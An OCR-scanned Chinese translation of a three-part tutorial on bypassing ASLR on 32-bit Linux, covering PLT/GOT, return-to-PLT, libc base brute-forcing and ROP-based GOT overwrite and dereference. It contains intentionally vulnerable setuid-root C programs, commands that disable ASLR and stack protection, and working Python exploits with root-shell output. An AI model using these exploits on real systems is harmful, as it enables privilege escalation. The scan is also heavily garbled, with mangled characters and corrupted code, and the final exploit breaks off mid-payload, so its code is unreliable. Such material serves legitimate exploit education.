不 是 调用 动态 链接 器 来 解析 函数 地 址 〈《 function ) 存根 代码 直接 从 
GOT ( GOT [n] ) 获取 功能 地 址 并 跳 转 到 它 。 因 此 ，PIC 使 用 这 个 表 来 重新 定位 
具有 两 级 间接 的 功能 地 址 。 


很 好 ， 你 阅读 了 关于 PIC 的 内 容 ， 并 了 解 了 它 有 助 于 保持 共享 库 代 码 段 的 完整 ， 因 
ne au i Ic yin) 
当 它 不 共享 任何 进程 时 ， 在 可 执行 文件 的 代码 段 需要 有 一 个 GOT 条 目 或 PLT 存 根 代 
码 ? 它 的 安全 保护 机 制 。 现 在 默认 情况 下 ， 代 码 段 只 能 被 赋予 读 取 和 执行 权限 ， 没 
有 写 入 权限 (RX ) 。 这 种 安全 保护 机 制 其 至 不 允许 动态 链接 器 写 入 代码 段 ， 
此 它 不 能 重新 定位 代码 段 中 发 现 的 数据 符号 或 函数 地 址 。 因 此 ， 为 了 允许 动态 链接 
器 重 定位 ， 可 执行 文件 也 需要 GOT 条 目 和 PLT 存 根 代 码 ， 就 像 共 享 库 一 样 ! 


实例 : 


//eg.c 
//$gcc -g -o eg eg.c 
#include <stdio.h> 


int main(int argc, char* argv[]) { 
printf("Hello %s\n", argv[1]); 
returni; 


} 


下 面 的 反 汇 编 显示 ， 我 们 不 会 直接 调用 printf ， 而 是 调用 相应 的 PLT 代 
码 printf@PLT 。 


(gdb) disassemble 
Dump of assembler 


0x080483e4 
0x080483e5 
0x080483e7 
0x080483ea 
0x080483ed 
0x080483f0 
0x080483f3 
0x080483f5 
0x080483fa 
0x080483fe 
0x08048401 
0x08048406 
0x0804840b 
0x0804840c 


«t0»: 
«t1»: 
«T3»: 
«t6»: 
«t9»: 


< 二 12> 
«415»: 
<+17>: 
<+22>: 
<+26>: 
<+29>: 
<+34>:! 
<+39>: 
<+40>:! 


main 
code for function main: 
push %ebp 
mov %esp,%ebp 
and $oxfffffffo,%esp 
sub $0x10,%esp 
mov Oxc(%ebp),%eax 

add $0x4, %eax 

mov (%eax),%edx 

mov $0x80484e0, %eax 
mov %edx, Ox4(96esp) 
mov %eax, (%esp ) 

call 0x8048300 <printf@plt> 
mov $0x0,96eax 

leave 

ret 


End of assembler dump. 

(gdb) disassemble 0x8048300 

Dump of assembler code for function printf@plt: 
0x08048300 <+0>: jmp *0x804a000 

0x08048306 <+6>: push $0x0 

0x0804830b «411»: jmp 0x80482f0 

End of assembler dump. 


(gdb) 


在 printf 第 一 次 调用 之 前 ， 其 相应 的 GOT 条 目 ( exse4aeoo ) 指针 将 返回 到 
PLT 代 码 ( 0x8048306 ) 。 因 此 ， 当 第 一 次 调用 printf 函数 时 ， 其 对 应 的 函数 


地 址 将 在 动态 链接 器 的 帮助 下 得 到 解决 。 


(gdb) x/ixw 0x804a000 
0x804a000 <printf@got.plt>: 0x08048306 


(gdb) 


现在 在 printf 的 调用 之 后 ， 其 相应 的 GOT 条 目 包含 printf 函数 地 址 (如 下 所 


zl 


(gdb) x/ixw 0x804a000 
0x804a000 <printf@got.plt>: Oxb7e6e850 


(gdb) 


注 1 : 如 果 你 想 知道 更 多 的 PLT 和 GOT， 请 看 这 个 博客 的 文章 | 


注 2 : 在 另 一 篇 文章 中 ， 我 将 详细 介绍 如 何在 动态 链接 器 的 帮助 下 动态 解析 libc 函 数 
地 址 。 到 目前 为 止 ， 只 要 记 住 下 面 两 个 语句 ( printf@PLT 的 一 部 分 ) 负责 函数 


地 址 解析 ! 


0x08048306 <+6>: push $0x0 
0x0804830b <+11>: jmp 0x80482f0 


现在 有 了 这 些 知 识 ， 我 们 知道 攻击 者 不 需要 精确 的 libc 有 函数 地 址 来 调用 libc 有 函数 ， 可 
以 使 用 function@PLT 地 址 (在 执行 之 前 知道 ) 来 简单 地 调用 它 。 


漏洞 代码 : 


#include <stdio.h> 
#include <string.h> 


/* Eventhough shell() function isnt invoked directly, its needed 
here since 'systemQPLT' and 'exitQPLT' stub code should be pres 
ent in executable to successfully exploit it. */ 
void shell() ( 

system("/bin/sh"); 

exit(0); 
} 


int main(int arge, char> argv 1) t 
int i=0; 

char bur [256]; 
strcpy(buf,argv[1]); 
printf("%s\n",buf); 

return o; 


编译 命令 : 


Zecho 2 > /proc/sys/kernel/randomize va space 
$gcc -g -fno-stack-protector -o vuln vuln.c 
$sudo chown root vuln 

$sudo chgrp root vuln 

$sudo chmod +S vuln 


现在 反 汇 编 可 执行 文件 'Vuln'， 我 们 可 以 找到 ‘system@PLT' 和 ‘exit@PLT' 的 地 址 。 


(gdb) disassemble shell 

Dump of assembler code for function shell: 
0x08048474 <+0>: push %ebp 

0x08048475 <+1>: mov %esp,%ebp 

0x08048477 <+3>: sub $0x18,%esp 

0x0804847a <+6>: movl $0x80485a0, (%esp) 
0x08048481 <+13>: call 0x8048380 <system@plt> 
0x08048486 <+18>: movl $0x0, (%esp) 
0x0804848d «425»: call 0x80483a0 <exit@plt> 
End of assembler dump. 

(gdb) 


使 用 这 些 地 址 我 们 可 以 写 一 个 绕 过 ASLR (和 NX 位 ) 的 漏洞 利用 代码 | 
利用 代码 : 


#exp . py 

#!/usr/bin/env python 
import struct 

from subprocess import call 


system = 0x8048380 

exit = 0x80483a0 

system_arg = 0x80485b5 ZObtained from hexdump output of exec 
utable 'vuln' 


#endianess convertion 
def conv(num): 
return struct.pack("«I",numystem + exit + system arg 
buf - "A" * 272 
buf += conv(system) 
buf += conv(exit) 
buf += conv(system arg) 


print "Calling vulnerable program" 
call(["./vuln", buf]) 


执行 上 面 的 exploit 程 序 给 我 们 root shell > 4e FAT : 


$ python exp.py 

Calling vulnerable program 

AAAAAAAAAAAAAAAAB88668 

4 id 

uid-1000(sploitfun) gid-1000(sploitfun) euid-O(root) egid=0(root 
) groups-O(root),4(adm),24(cdrom),27(sudo), 30(dip),46(plugdev),1 
09(lpadmin),124(sambashare), 1000(sploitfun) 

# exit 

$ 


注意 : 为 了 获得 这 个 root shell， 可 执行 文件 应 包含 system@PLT 和 exit@PLT 4X 
码 。 在 第 三 部 分 中 ， 我 将 讨论 GOT 履 盖 和 GOT 解 引用 技术 ， 即 使 在 可 执行 文件 中 不 
存在 必需 的 PLT 存 根 代 码 ， 并 且 当 ASLR 被 打开 时 ， 也 可 以 帮助 攻击 者 调用 libc 艺 
数 。 


译 者 : 飞龙 

原文 : Bypassing ASLR - Part Il 
预备 条 件 : 
经 典 的 基于 栈 的 溢出 
VM 配置 ` Ubuntu 12.04 (x86) 


这 篇 文章 中 ， 让 我 们 看 看 如 何 使 用 爆破 技巧 ， 来 绕 过 共享 库 地 址 随机 化 。 


什么 是 爆破 ? 


在 这 个 技巧 中 ， 攻 击 者 选择 特定 的 Libc 基 址 ， 并 持续 攻击 程序 直到 成 功 。 假 设 你 足 


够 幸运 ， 这 个 技巧 是 用 于 绕 过 ASLR 的 
漏洞 代码 : 
//Nuln.c 


#include <stdio.h> 
#include <string.h> 


int main(int arge char argy |) 4 


char buf[256]; 
strcpy(buf,argv[1]); 
printf("%s\n", buf); 
fflush(stdout); 

ret Uma 


j 


编译 命令 : 


Zecho 2 > /proc/sys/kernel/randomize va space 
$gcc -fno-stack-protector -g -o vuln vuln.c 


$sudo chown root vuln 
$sudo chgrp root vuln 
$sudo chmod +s vuln 


让 我 们 来 看 看 ， 攻 击 者 如 何 爆破 Libe 基 址 。 下 面 是 ( 当 随 机 化 打开 时 ) 不 同 的 


Libc 基 址 : 


$ ldd ./vuln | grep libc 

libc.so.6 -» /lib/i386-linux-gnu/libc.so.6 (0xb75b6000) 
$ ldd ./vuln | grep libc 

libc.so.6 -» /lib/i386-linux-gnu/libc.so.6 (0xb7568000) 
$ ldd ./vuln | grep libc 

libc.so.6 -» /lib/i386-linux-gnu/libc.so.6 (0xb7595000) 
$ ldd ./vuln | grep libc 

libc.so.6 -» /lib/i386-linux-gnu/libc.so.6 (0xb75d9000) 
$ ldd ./vuln | grep libc 

libc.so.6 -» /lib/i386-linux-gnu/libc.so.6 (0xb7542000) 
$ ldd ./vuln | grep libc 

libc.so.6 -» /lib/i386-linux-gnu/libc.so.6 (0xb756a000) 


上 面 展 示 了 ，Libc 随机 化 仅 限 于 8 位 。 因 此 我 们 可 以 在 最 多 256 次 尝试 内 ， 得 到 
root shell。 在 下 面 的 利用 代码 中 ， 让 我 们 选择 0xb7595000 作为 Libe 基 址 ， 并 让 
我 们 尝试 几 次 。 


利用 代码 : 





#exp . py 

#!/usr/bin/env python 
import struct 

from subprocess import call 


libc_base_addr = 0xb7595000 


exit off = 0x00032be® #Obtained from "readelf 


c.so.6 | grep system" command. 


system off = 0x0003f060 #Obtained from "readelf 


c.so.6 | grep exit" command. 

system_addr = libc_base_addr + system_off 
exit_addr = libc_base_addr + exit_off 
system_arg = 0x804827d 


#endianess convertion 
def conv(num): 
return struct.pack("<I",numystem + exit + system arg 
buf = "A" * 268 
buf += conv(system addr) 
buf += conv(exit addr) 
buf += conv(system_arg) 


print "Calling vulnerable program" 
#Multiple tries until we get lucky 
i=0 
while (i < 256): 

print "Number of tries: %d" 96i 

i += 1 

ret = call(["./vuln", buf]) 

if (not ret): 

break 

else: 

print "Exploit failed" 


运行 上 面 的 利用 代码 ， 我 们 会 得 到 root shell (4 FORT) 


-S lib 


-s lib 


$ python exp.py 

Calling vulnerable program 
Number of tries: O 
AAAAAAAAAAAA  Q] ?? (N?) ? 
Exploit failed 


Number of tries: 42 

AAAAAAAAAAAA  Q]?? (N?)? 

Exploit failed 

Number of tries: 43 

AAAAAAAAAAAA  Q]?? (N?) ? 

4 id 

uid-1000(sploitfun) gid-1000(sploitfun) euid-O(root) egid=0(root 
) groups=0(root),4(adm), 24(cdrom),27(sudo), 30(dip), 46(plugdev),1 
09(1lpadmin),124(sambashare),1000(sploitfun) 

# exit 

$ 


注意 : 也 可 以 爆破 类 似 的 栈 和 堆 段 的 地 址 。 


译 者 : 飞龙 
原文 : Bypassing ASLR - Part Ill 
预备 条 件 : 


1. 经 典 的 基于 栈 的 溢出 
2. 绕 过 ASLR -- 第 一 部 分 


VM 配置 : Ubuntu 12.04 (x86) 


在 这 篇 文章 中 ， 让 我 们 看 看 如 何 使 用 GOT REF 5] 7] dX 72 o X DELE EISE 
随机 化 。 我 们 在 第 一 部 分 中 提 到 过 ， 即 使 可 执行 文件 没有 所 需 的 PLT 桩 代码 ， 攻 击 
者 也 可 以 使 用 GOT 覆盖 和 解 引 用 技巧 来 绕 过 ASLR e 


漏洞 代码 : 


Hi NASE 

#include <stdio.h> 
#include <string.h> 
#include <stdlib.h> 


int Main (int arge, char ~*argyv) 4 
char buf[256]; 
int aks 
seteuid(getuid()); 
if(arge < 2) { 
puts("Need an argument\n"); 
exit(-1); 


} 

strcpy(buf, argv[1]); 

printf("%s\nLen:%d\n", buf, (int)strlen(buf)); 
return ®; 


编译 命令 : 


Zecho 2 > /proc/sys/kernel/randomize va space 
$gcc -fno-stack-protector -o vuln vuln.c 
$sudo chown root vuln 

$sudo chgrp root vuln 

$sudo chmod +s vuln 


1. systemQPLT 并 没有 在 我 们 的 可 执行 文件 vuln 中 出 现 。 
2. 字符 串 sh 也 没有 在 我 们 的 可 执行 文件 vuln 中 出 现 。 


什么 是 GOT SS 


这 个 技巧 帮助 攻击 者 ， 将 特定 Libe 函数 的 GOT 条 目 履 盖 为 另 一 个 Libe 函数 的 地 
b (在 第 一 次 调用 之 后 ) 。 但 是 它 也 可 以 覆盖 为 execve BAMA HHL -- 当 偏 移 差 
加 到 GOT[getuid] 的 时 候 。 我 们 已 经 知道 了 ， 在 共享 库 中 ， 函 数 距 离 其 基 址 的 偏 
移 永 远 是 固定 的 。 所 以 ， 如 果 我 们 将 两 个 Libe 函数 的 差 值 

( execve 和 getuid ) 加 到 getuid 4] GOT 条目， 我 们 就 得 到 了 execve dë 
数 的 地 址 。 之 后 ， 调 用 getuid 就 会 调用 execve 。 


offset diff 
GOT[getuid] 


execve addr - getuid addr 
GOT[getuid] + offset diff 


TF A X GOT 解 引 用 ? 


GOT & ° 但 是 这 里 不 会 覆盖 特定 Libc 424) GOT AA? me 

将 它 的 值 复 制 到 寄存 器 中 ， 并 将 偏 移 差 加 到 寄存 器 的 内 容 。 因 此 ， 寄 存 器 就 含有 所 
需 的 Libc 元 数 地 址 。 例 如 ， GOT[getuid] 包含 getuid 的 函数 地 址 ， 将 其 复制 
到 寄存 器 。 两 个 Libc HA ( execve 和 getuid ) 的 偏 移 差 加 到 寄存 器 的 内 容 。 
现在 跳 到 寄存 器 的 值 就 调用 了 execve 。 


offset diff = execve addr - getuid addr 
eax - GOT[getuid] 
eax = eax + offset diff 


这 两 个 技巧 看 起 来 类 似 ， 但 是 当 缓 冲 区 溢出 发 生 时 ， 如 何在 运行 时 期 执行 这 些 操 作 
呢 ? 我 们 需要 识别 出 一 个 函数 ( 它 执 行 这 些 加 法 ， 并 将 结果 复制 到 寄存 器 ) SH 
到 特定 的 函数 来 完成 GOT A si ARASA 。 但 是 很 显 然 ， 没 有 单一 的 函数 (不 
Libc 也 不 在 我 们 的 可 执行 文件 中 ) 能 够 为 我 们 做 这 些 。 这 里 我 们 使 用 ROP © 


什么 是 ROP? 


ROP 是 个 技巧 ， 其 中 攻击 者 一 旦 得 到 了 调用 栈 的 控制 之 后 ， 他 就 可 以 执行 精心 构 
造 的 机 器 指令 ， 来 执行 它 所 需 的 操作 ， 即 使 没有 直接 的 方式 。 例 如 ， 在 return-to- 
libe 攻击 中 ， 我 们 将 返回 地 址 履 盖 为 system 的 地 址 ， 来 执行 system 。 但 是 如 
果 system (以 及 execve HAH) 从 Libc 共享 库 中 溢出 了 ， 攻 击 者 就 不 能 获得 
root shell。 这 时 ，ROP 就 可 。 在 这 个 技巧 中 ， 即 使 任何 所 需 的 Libe 
函数 都 不 存在 ， 攻 击 者 可 以 通过 执行 一 系列 的 零件 (gadget) ， 来 模拟 所 需 的 Libc 


什么 是 零件 ? 


零件 是 一 系列 汇编 指令 ， 它 们 以 ret 汇编 指令 结尾 。 攻 击 者 使 用 零件 地 址 来 履 盖 
返回 地 址 ， 这 个 零件 包含 一 系列 汇编 指令 ， 它 们 类 似 于 system 开头 的 一 些 汇编 指 
令 。 所 以 ， 返 回 到 这 个 零件 地 址 ， 就 可 以 执行 一 部 分 system HH 


能 。 system 功能 的 剩余 部 分 ， 通 过 返回 到 一 些 其 他 零件 来 完成 。 由 此 ， 链 接 一 系 
列 的 零件 可 以 模拟 system 的 功能 。 因 此 system 即使 移 除 了 也 能 够 执行 。 


但 是 如 何在 可 执行 文件 中 找到 可 用 的 零件 ? 


可 以 使 用 零件 工具 来 寻找 。 有 很 多 工具 ， 例 如 ropeme、ROPgadget、rp++， 它 们 
有 助 于 攻击 者 在 二 进 制 中 寻找 零件 。 这 些 工具 大 多 都 寻找 ret 指令 ， 之 后 往 回 看 
来 寻找 实用 的 机 器 指令 序列 。 


在 我 们 这 里 ， 我 们 并 不 需要 使 用 ROP 零件 俩 模拟 任何 Libe 函数 ， 反 之 ， 我 们 需要 
B £Libc 函数 的 GOT 条 目 ， 或 者 确保 任何 寄存 器 指向 Libe 函数 地 址 。 让 我 们 看 
看 如 何 使 用 ROP 零件 来 完成 GOT 履 盖 和 解 引 用 吧 。 


使 用 ROP 的 GOT SS 


零件 1 : 首先 我 们 需要 一 个 零件 ， 它 将 偏 移 差 加 到 cor[getuid] 上 。 所 以 让 我 们 
寻找 一 个 add 零件 ， 它 将 结果 复制 到 内 存 区 域 中 。 


$ ~/roptools/rp++ --atsyntax -f ./vuln -r 1 
Trying to open './vuln'.. 

Loading ELF information.. 

FileFormat: Elf, Arch: Ia32 

Using the AT&T syntax.. 


Wait a few seconds, rp++ is looking for gadgets.. 
in PHDR 
© found. 


in LOAD 
65 found. 


A total of 65 gadgets found. 


0x080486fb: addb %dh, -OxO01(96esi,96edi,8) ; jmpl *0x00(%ecx) ; (1 
found) 
0x0804849e: addl %eax, Ox5D5B04C4(%ebx) ; ret ; (1 found) 


a 


好 的 。 我 们 找到 了 一 个 add 零件 ， 它 将 结果 复制 到 内 存 区 域 中 。 现 在 如 果 我 们 可 
以 使 EBX 包含 GoT[getuid] - Ox5d5b04c4 ， 并 使 EAX 包含 偏 移 差 ， 我 们 就 可 
以 成 功 执行 GOT BS, 


零件 2 : 确保 EBX 包含 getuid 的 GOT 条目。 getuid 的 GOT 条 目 (在 下 面 展 
m) 位 于 0x804a004 。 因 此 EBX 应 该 为 ox804a004 ， 但 是 由 于 add 零件 中 ， 
固定 值 Ox5d5bO4ca 加 到 了 EBX? PFA EBX 应 减 去 这 个 国定 值 ， 也 就 

是 ebx = 0x804a004 -0x5d5b04c4 = 9xaaa99b49 。 现 在 我 们 需要 寻找 一 个 零 
件 ， 它 将 这 个 值 Oxaaa99b4o 复制 到 EBX 寄存 器 中 。 


$ objdump -R vuln 
vuln: file format elf32-1386 


DYNAMIC RELOCATION RECORDS 

OFFSET TYPE VALUE 

08049ffO R 386 GLOB DAT gmon start _ 
0804a000 R 386 JUMP SLOT printf 
0804a004 R 386 JUMP SLOT getuid 





$ -/roptools/rp++ --atsyntax -f ./vuln -r 1 
Trying to open './vuln'.. 

Loading ELF information.. 

FileFormat: Elf, Arch: Ia32 

Using the AT&T syntax.. 


Wait a few seconds, rp++ is looking for gadgets.. 
in PHDR 
© found. 


in LOAD 
65 found. 


A total of 65 gadgets found. 

0x08048618: popl %ebp ; ret ; (1 found) 
0x08048380: popl %ebx ; ret ; (1 found) 
0x08048634: popl %ebx ; ret ; (1 found) 


d 


好 的 ， 我 们 找到 了 pop ebx 零件 。 因 此 将 该 值 0xaaa99b40 压 入 栈 ， 并 返回 
到 pop ebx 之 后 ，EBX 包含 0xaaa99b40 > 


零件 3 : 确保 EAX 包含 偏 移 差 。 因 此 我 们 需要 找到 一 个 零件 ， 它 将 偏 移 差 复制 到 
EAX 寄存 器 中 。 


$ gdb -q vuln 


(gdb) p execve 

$1 = {} Oxb761a1f0 

(gdb) p getuid 

$2 = {} Oxb761accO 

(gdb) p/x execve - getuid 
$4 = Oxfffff530 


(gdb) 


$ -/roptools/rp++ --atsyntax -f ./vuln -r 1 
Trying to open './vuln'.. 

Loading ELF information.. 

FileFormat: Elf, Arch: Ia32 

Using the AT&T syntax.. 


Wait a few seconds, rp++ is looking for gadgets.. 
in PHDR 
© found. 


in LOAD 
65 found. 


A total of 65 gadgets found. 


0x080484a3: popl %ebp ; ret ; (1 found) 
0x080485cf: popl %ebp ; ret ; (1 found) 
0x08048618: popl %ebp ; ret ; (1 found) 
0x08048380: popl %ebx ; ret ; (1 found) 
0x08048634: popl %ebx ; ret ; (1 found) 


S 


因此 将 偏 移 差 9xfffff539 压 入 栈 中 ， 并 返回 到 pop eax 指令 ， 将 偏 移 差 复制 给 
EAX。 但 是 不 幸 的 是 ， 在 我 们 的 二 进 制 vuln 中 ， 我 们 不 能 找 
到 popl %eax; ret; 零件 。 因 此 GOT Rw eK A ABH) © 


栈 布局 : 下 面 的 图 片 描述 了 用 于 完成 GOT 覆盖 的 零件 链 。 


绕 过 ASLR -- 第 三 部 分 


Gadget 1 


Oxbffffifc -————— Return Address 


Oxbffffif8 «— EBP 


+ Alignment Space 
| + buf ends here 


OxbffffOfO _ | 4———— buf starts here 





| Ha. ESP e NOTE: Gadget 3 isnt 
oxbfffoen | | SE 


main() Stack Layout executable. 


使 用 ROP 的 GOT 解 引用 


零件 1 : 首先 我 们 需要 一 个 零件 ， 它 将 偏 移 差 加 到 GOT[getuid] ， 并 且 它 的 结果 


需要 加 载 到 寄存 器 中 。 所 以 让 我 们 寻找 一 个 add 零件 ， 它 将 结果 复制 到 寄存 器 
中 。 


$ -/roptools/rp++ --atsyntax -f ./vuln -r 4 
Trying to open './vuln' 

Loading ELF information.. 

FileFormat: Elf, Arch: Ia32 

Using the AT&T syntax.. 


Wait a few seconds, rp++ is looking for gadgets.. 
in PHDR 
© found. 


in LOAD 
166 found. 


A total of 166 gadgets found. 


0x08048499: addl $0x0804A028, %eax ; addl %eax, Ox5D5BOACA(96ebx) 


; ret ; (1 found) 
0x0804849e: addl %eax, Ox5D5B04C4(%ebx) ; ret ; (1 found) 


0x08048482: addl %esp, Ox0804A02C(%ebx) ; calll *0x08049F1C(,%ea 


x,4) ; (1 found) 
0x0804860e: addl -OxOB8A0008(%ebx), %eax ; addl $0x04, %esp ; 
pl %ebx ; popl %ebp ; ret ; (1 found) 
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好 的 。 我 们 找到 一 个 add 零件 ， 它 将 结果 复制 到 寄存 器 中 。 现 在 如 果 我 们 可 以 使 
EBX 包含 GOT[getuid] + 0xb8a0008 ， 并 使 EAX 包含 偏 移 差 ， 我 们 就 可 以 成 功 
执行 GOT 解 引用 。 


零件 2 : RME GOT 履 盖 中 看 到 ， 可 执行 文件 vuln 中 找到 
了 pop %ebx; ret; ° 


零件 3 : 我 们 在 GOT 覆盖 中 看 到 ， 可 执行 文件 vuln FHAR 
到 pop %eax; ret; ° 


零件 4 : 通过 调用 寄存 器 来 调用 execve 。 因 此 我 们 需要 call *eax K o 


$ -/roptools/rp++ --atsyntax -f ./vuln -r 1 
Trying to open './vuln'.. 

Loading ELF information.. 

FileFormat: Elf, Arch: Ia32 

Using the AT&T syntax.. 


Wait a few seconds, rp++ is looking for gadgets.. 
in PHDR 
© found. 


in LOAD 
65 found. 


A total of 65 gadgets found. 
0x080485bb: calll *%-0x000000E9(%ebx,%esi,4) ; (1 found) 
0x080484cf: calll *%eax ; (1 found) 
0x0804860b: calll *%eax ; (1 found) 
$ 
好 的 。 我 们 发 现 了 call *eax 零件 。 但 是 还 是 因为 零件 3 popl *eax; ret; 7X 
有 找到 ，GOT 解 引用 也 是 无 法 实现 的 。 
栈 布局 : 下 面 的 图 片 描述 了 用 于 完成 GOT 解 引 用 的 零件 链 : 


所 一 一 argv 


+ argc 


+ Return Address 





Oxbffffifc 
Oxbffffif8 -————— EBP 

*«————— Alignment Space 

-——— — buf ends here 

e NOTE: 
OxbffffOfO +— buf starts here Gadget 3 
isnt found 
Oxbffff0e0 +—— ESP t 
main() Stack Layout executable. 


在 似乎 没有 更 多 方法 时 (至 少 对 于 我 来 说 ， 当 我 开始 了 解 ROP 的 时 候 ) > Reno 向 
我 介绍 了 下 面 的 解法 ， 通 过 手动 搜索 ROP 零件 。 非 常 感 谢 ， 所 以 继续 吧 。 


手动 搜索 ROP 零件 


由 于 ROP 零件 工具 不 能 找到 pop eax;ret; 零件 ， 让 我 们 手动 搜索 来 寻找 ， 是 否 
能 找到 任何 有 趣 的 零件 ， 能 够 帮助 我 们 将 偏 移 差 复制 给 EAX 寄存 器 。 
反 汇 编 二 进 制 vuln (使 用 下 面 的 命令 ) 


$objdump -d vuln > out 


零件 4 : 使 用 偏 移 差 9xfffff530 加 载 EAX。 反 汇编 展示 了 一 个 MOV 指令 ， 它 将 
栈 内 容 复 制 给 EAX : 
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80485b3: mov Ox34(%esp),%eax 
80485b7: mov %eax, Ox4(%esp) 
80485bb: call *-OxeO(%ebx,%esi,4) 
80485c2: add $0x1,%esi 

80485c5: cmp %edi,%esi 

80485c7: jne 80485a8 <__libc_csu_init+0x38> 
80485c9: add $Ox1c,%esp 

80485cc: pop %ebx 

80485cd: pop %esi 

80485ce: pop %edi 

80485cf: pop %ebp 

80485d0: ret 





但 是 ret ( 0x8048500 ) 看 起 来 离 这 个 指令 ( Ox80485b3 ) 很 远 。 所 以 这 里 的 
挑战 是 ， 在 ret 指令 之 前 ， 我 们 需要 保证 EAX 不 被 修改 。 


不 修改 EAX : 


这 里 让 我 们 看 看 如 何 使 EAX 在 ret 484 ( 0x80485d0 ) 之 前 不 被 修改 。 这 是 一 
个 调用 指令 ( 0x80485bb ) ， 所 以 让 我 们 用 这 种 方式 来 加 载 EBX 和 ESI? REH 
用 指令 会 调用 一 个 函数 ， 它 不 修改 EAX。 fini 看 起 来 不 修改 EAX ° 


SS 


0804861c « fini»: 

804861c: push %ebx 

804861d: sub $0x8,%esp 

8048620: call 8048625 <_fini+0x9> 

8048625: pop %ebx 

8048626: add $0x19cf,%ebx 

804862c: call 8048450 <__do_global_dtors_aux> 
8048631: add $0x8,%esp 

8048634: pop %ebx 

8048635: ret 


08048450 « do global dtors aux: 

8048450: push %ebp 

8048451: mov %esp,%ebp 

8048453: push %ebx 

8048454: sub $0x4,%esp 

8048457: cmpb $0x0, 0x804a028 

804845e: jne 804849f « do global dtors aux*0Ox4f» 


804849f: add $0x4,%esp 
80484a2: pop %ebx 
80484a3: pop %ebp 
80484a4: ret 


fini AMT do global dtors aux ， 在 我 们 将 内 存 地 址 0x804a028 设 为 1 
的 时 候 ， 这 里 EAX 可 以 可 以 保留 下 来 。 


Y) 


为 了 调用 fini » EBX Ze ESI 的 值 是 什 


么 呢 
1. 首先 我 们 需要 了 寻找 一 个 内 存 地 址 ， 它 包含 fini 的 地 址 0x804861c 。 像 下 
面 展示 的 那样 ， 内 存 地 址 0x8049f3c 包含 了 fini 地 址 。 


0x8049f28 : 0x00000001 0x00000010 0x0000000c 0x08048354 
0Ox8049f38 <_DYNAMIC+16>: 0x0000000d 0x0804861c Ox6ffffef5 Ox 
080481ac 


0x8049f48 <_DYNAMIC+32>: 0x00000005 0x0804826c 


2. 将 ESI 设 为 0x01020101 。 推 荐 这 个 值 ， 因为 我 们 不 能 将 其 设 为 Oxo ， 它 
是 strcpy 的 漏洞 代码 ， 零 是 坏 字 符 。 同 样 ， 确 保 产生 的 值 (储存 在 EBX 
F) 也 不 包含 零 。 


3. 像 下 面 那样 设置 EBX : 


ebx*esi*4-OxeO = 0x8049f3c 
ebx = 0x8049f3c -(0x01020101*0x4) + Oxed 
ebx = Ox3fc9c18 


因此 ， 我 们 发 现 ， 为 了 调用 fini ， 我 们 需要 确保 EBX 和 ESI 分 别 加 载 
为 0x3fc9c18 和 0x01020101 ° 


同样 确保 EAX 不 要 在 fini 的 返回 处 ( Ox8048635 ) 和 返回 指令 

( 0x80485d0 ) 之 间 修 改 。 这 可 以 通过 设置 edi = esi + 1 ks o da RI E. 
了 edi = esi + 1 > BITES 0x80485c7 就 会 确保 控制 流 跳 转 

到 0x80485c9 的 指令 。 之 后 我 们 可 以 看 到 ， 0x80485c9 指令 到 返回 指令 

( 0x80485d0 ) 之 间 ，EAX 都 不 会 改动 。 


零件 5 : 将 EBX WRA 9x3fc9c18 


$ -/roptools/rp++ --atsyntax -f ./vuln -r 1 
Trying to open './vuln'.. 

Loading ELF information.. 

FileFormat: Elf, Arch: Ia32 

Using the AT&T syntax.. 


Wait a few seconds, rp++ is looking for gadgets.. 
in PHDR 
© found. 


in LOAD 
65 found. 


A total of 65 gadgets found. 

0x08048618: popl %ebp ; ret ; (1 found) 
0x08048380: popl %ebx ; ret ; (1 found) 
0x08048634: popl %ebx ; ret ; (1 found) 


= 


零件 6 JS ESI 加 载 为 0x01020101 » EDI 加 载 为 0x01020102 : 


$ -/roptools/rp++ --atsyntax -f ./vuln -r 3 
Trying to open './vuln'.. 

Loading ELF information.. 

FileFormat: Elf, Arch: Ia32 

Using the AT&T syntax.. 


Wait a few seconds, rp++ is looking for gadgets.. 
in PHDR 
© found. 


in LOAD 
135 found. 


A total of 135 gadgets found. 

0x080485ce: popl %edi ; popl %ebp ; ret ; (1 found) 

0x080485cd: popl %esi ; popl %edi ; popl %ebp ; ret ; (1 found) 
0x08048390: pushl 0x08049FF8 ; jmpl *0x08049FFC ; (1 found) 


SH 


零件 7 :将 oxi 复制 到 内 存 地 址 0x804a028 


$ -/roptools/rp++ --atsyntax -f ./vuln -r 5 
Trying to open './vuln'.. 

Loading ELF information.. 

FileFormat: Elf, Arch: Ia32 

Using the AT&T syntax.. 


Wait a few seconds, rp++ is looking for gadgets.. 
in PHDR 
© found. 


in LOAD 
183 found. 


A total of 183 gadgets found. 


0x080485ca: les (%ebx,%ebx,2), %ebx ; popl %esi ; popl %edi ; po 
pl %ebp ; ret ; (1 found) 

0x08048498: movb $0x00000001, 0x0804A028 ; addl $0x04, %esp ; po 
pl %ebx ; popl %ebp ; ret ; (1 found) 

0x0804849b: movb 0x83010804, %al ; les (%ebx,%ebx,2), %eax ; pop 
l %ebp ; ret ; (1 found) 


p 
现在 我 们 完成 了 零件 的 搜索 。 让 我 们 开始 游戏 吧 | 


零件 搜索 总 结 


e 为 了 零件 1 的 成 功 调 用 ， 我 们 需要 零件 2 和 3。 
e 由 于 零件 3 不 存在 ， 我 们 执行 手动 搜索 ， 并 找到 了 零件 4、5、6 和 7。 
e 为 了 零件 4 的 成 功 调用 ， 我 们 需要 零件 5、6 和 7。 


利用 代码 
下 面 的 利用 代码 使 用 execve HALLE ST cor[getuid] 


#!/usr/bin/env python 
import struct 
from subprocess import call 


G1: 0x0804849e: addl %eax, Ox5D5B04C4(%ebx) ; ret ; 
G2: 0x080484a2: popl %ebx ; pop ebp; ret ; 

G3: 0x????????: popl %eax ; ret ; (NOT found) 

G4: 0x080485b3: mov Ox34(%esp),%eax... 

G5: 0x08048380: pop ebx ; ret ; 

G6: 0x080485cd: pop esi ; pop edi ; pop ebp ; ret ; 





G7: 0x08048498: movb $0x1,0x804a028... 


gi - 0x0804849e 
g2 = 0x080484a2 
g4 = 0x080485b3 
g5 - 0x08048380 
g6 - 0x080485cd 
g/ = 0x08048498 


dummy = Oxdeadbeef 
esi - 0x01020101 


edi = 0x01020102 
ebx = Ox3fc9c18 #ebx = 0x8049f3c - (esi*4) + OxeO 
off = Oxfffff530 


#endianess convertion 
def conv(num): 
return struct.pack("<I",num* 268 #Junk 
buf += conv(g7) #movb $0x1,0x804a028; add esp, 0x04; pop ebx; po 
p ebp; ret; 
buf += conv(dummy) 
buf += conv(dummy) 
buf += conv(dummy) 
